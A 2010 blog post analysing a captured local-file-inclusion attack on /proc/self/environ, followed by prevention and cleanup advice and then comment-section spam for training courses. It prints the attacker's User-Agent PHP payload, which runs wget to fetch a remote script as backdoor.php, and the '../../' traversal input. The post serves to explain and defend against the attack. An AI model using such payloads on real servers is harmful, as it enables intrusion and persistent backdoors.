Friday, June 25, 2010

The proc/self/environ Injection

Event Details

21 June 2010

POST Values
file: ../../proc/self/environ

HTTP_USER_AGENT: <? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this:
// Include file requested

Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:

DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)

However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:

// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");

Now the hacker can now visit his page and run any commands he wants on your webserver.

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      $allowed_index = array_search($_GET['file'], $allowed_files)
      if ($allowed_index !== NULL)
      include $allowed_files[$allowed_index];

    • Don't allow visitors to specify by name

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      if (!empty($allowed_files[$_GET['file']]))
      include $allowed_files[$_GET['file']];

Threat Level

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.


  1. I appreciate your efforts because it conveys the message of what you are trying to say. It's a great skill to make even the person who doesn't know about the subject could able to understand the subject . Your blogs are understandable and also elaborately described. I hope to read more and more interesting articles from your blog. All the best.

    rpa training in bangalore
    best rpa training in bangalore
    RPA training in bangalore
    rpa course in bangalore
    rpa training in chennai
    rpa online training

  2. Some us know all relating to the compelling medium you present powerful steps on this blog and therefore strongly encourage contribution from other ones on this subject while our own child is truly discovering a great deal. Have fun with the remaining portion of the year.
    python training Course in chennai
    python training in Bangalore
    Python training institute in bangalore


  3. Whoa! I’m enjoying the template/theme of this website. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between superb usability and visual appeal. I must say you’ve done a very good job with this.

    AWS Training in Bangalore | Best AWS Amazon Web Services…
    Amazon Web Services (AWS) Training in Pune India
    AWS Training | AWS Training and Certification | AWS online training
    AWS Training in Bangalore cost| Aws training in Bangalore with placements

  4. Hi, Great.. Tutorial is just awesome..It is really helpful for a newbie like me.. I am a regular follower of your blog. Really very informative post you shared here. Kindly keep blogging.
    AWS Training in pune

    AWS Online Training

    AWS Training in Bangalore

  5. Great post. I was once checking constantly this weblog and I'm impressed! Extremely useful information specially the closing part. I maintain such information much. I was once seeking this specific information for a very long time. Many thanks and best of luck.
    samsung mobile service center in velachery
    samsung mobile service center in porur
    samsung mobile service center in vadapalani

  6. nice blog
    get best placement at VSIPL

    digital marketing services
    web development company
    seo network point

  7. nice blog
    get best placement at VSIPL

    get digital marketing services
    seo network point

  8. nice blog
    get best placement at VSIPL

    get digital marketing services
    seo network point